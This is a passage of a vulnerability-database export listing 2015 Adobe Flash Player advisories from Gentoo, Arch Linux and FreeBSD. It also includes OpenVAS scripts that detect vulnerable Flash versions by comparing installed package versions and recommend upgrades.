\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.460\"", "edition": 1, "modified": "2015-05-31T00:00:00", "published": "2015-05-31T00:00:00", "id": "GLSA-201505-02", "href": "https://security.gentoo.org/glsa/201505-02", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "- CVE-2015-0346 (arbitrary code execution)\n\nA double-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0347 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0348 (arbitrary code execution)\n\nA buffer overflow vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0349 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0350 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0351 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary 
code\nexecution via unspecified vectors.\n\n- CVE-2015-0352 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0353 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0354 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0355 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0356 (arbitrary code execution)\n\nA type confusion vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0357 (ASLR protection bypass)\n\nFlash does not properly restrict discovery of memory addresses, which\nallows attackers to bypass the ASLR protection mechanism via unspecified\nvectors.\n\n- CVE-2015-0358 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0359 (arbitrary code execution)\n\nA double-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0360 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3038 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3039 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-3040 (ASLR protection bypass)\n\nFlash does not properly restrict 
discovery of memory addresses, which\nallows attackers to bypass the ASLR protection mechanism via unspecified\nvectors.\n\n- CVE-2015-3041 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3042 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3043 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3044 (information disclosure)\n\nAttackers are able to bypass intended access restrictions and obtain\nsensitive information via unspecified vectors.", "modified": "2015-04-17T00:00:00", "published": "2015-04-17T00:00:00", "id": "ASA-201504-18", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-April/000297.html", "type": "archlinux", "title": "flashplugin: multiple issues", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. 
Adobe is aware of a report that an exploit for\n\t CVE-2015-3043 exists in the wild, and recommends users update their\n\t product installations to the latest versions.\n\t \n\n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n\t CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n\t CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-0356).\n\t \n\n\t These updates resolve a buffer overflow vulnerability that could\n\t lead to code execution (CVE-2015-0348).\n\t \n\n\t These updates resolve use-after-free vulnerabilities that could lead\n\t to code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n\t CVE-2015-3039).\n\t \n\n\t These updates resolve double-free vulnerabilities that could lead to\n\t code execution (CVE-2015-0346, CVE-2015-0359).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-0357, CVE-2015-3040).\n\t \n\n\t These updates resolve a security bypass vulnerability that could\n\t lead to information disclosure (CVE-2015-3044).\n\t \n\n\n", "edition": 4, "modified": "2015-04-14T00:00:00", "published": "2015-04-14T00:00:00", "id": "3364D497-E4E6-11E4-A265-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/3364d497-e4e6-11e4-a265-c485083ca99c.html", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", 
"CVE-2015-3091"], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe recommends users update their product\n\t installations to the latest versions.\n\t \n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n\t CVE-2015-3093).\n\t \n\n\t These updates resolve a heap overflow vulnerability that could lead\n\t to code execution (CVE-2015-3088).\n\t \n\n\t These updates resolve a time-of-check time-of-use (TOCTOU) race\n\t condition that could be exploited to bypass Protected Mode in\n\t Internet Explorer (CVE-2015-3081).\n\t \n\n\t These updates resolve validation bypass issues that could be\n\t exploited to write arbitrary data to the file system under user\n\t permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\t \n\n\t These updates resolve an integer overflow vulnerability that could\n\t lead to code execution (CVE-2015-3087).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\t \n\n\t These updates resolve a use-after-free vulnerability that could lead\n\t to code execution (CVE-2015-3080).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\t \n\n\t These updates resolve a security bypass vulnerability that could lead\n\t to information disclosure (CVE-2015-3079), and provide additional\n\t hardening to protect against CVE-2015-3044.\n\t \n\n", "edition": 4, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "E206DF57-F97B-11E4-B799-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html", "title": 
"Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:38:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850878", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0723-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850878\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:22:27 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0723-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.457 to fix several\n security issues that could have lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities have been fixed:\n\n * Memory corruption vulnerabilities that could have lead to code\n execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, 
CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n * Type confusion vulnerability that could have lead to code execution\n (CVE-2015-0356).\n\n * Buffer overflow vulnerability that could have lead to code execution\n (CVE-2015-0348).\n\n * Use-after-free vulnerabilities that could have lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n\n * Double-free vulnerabilities that could have lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n\n * Memory leak vulnerabilities that could have been used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n\n * Security bypass vulnerability that could have lead to information\n disclosure (CVE-2015-3044).\n\n Security Issues:\n\n * CVE-2015-0346\n\n * CVE-2015-0347\n\n * CVE-2015-0348\n\n * CVE-2015-0349\n\n * CVE-2015-0350\n\n * CVE-2015-0351\n\n * CVE-2015-0352\n\n * CVE-2015-0353\n\n * CVE-2015-0354\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0723-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.457~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.457~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.457~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-04-20T00:00:00", "id": "OPENVAS:1361412562310805464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805464", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 
implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805464\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 12:39:25 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is 
not\n properly validated.\n\n - Improper restriction of discovery of memory addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.281 or 17.0.0.169 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.281\"))\n{\n fix = \"13.0.0.281\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.168\"))\n{\n fix = \"17.0.0.169\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", 
"CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851029", "type": "openvas", "title": "SUSE: Security Advisory for Adobe (SUSE-SU-2015:0722-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851029\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:00:29 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Adobe (SUSE-SU-2015:0722-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Adobe'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, 
CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\");\n\n script_tag(name:\"affected\", value:\"Adobe on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0722-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.457~80.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.457~80.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-07-19T22:12:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-04-20T00:00:00", "id": "OPENVAS:1361412562310805466", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805466", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Linux)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805466\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 14:39:25 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Improper restriction of discovery of memory 
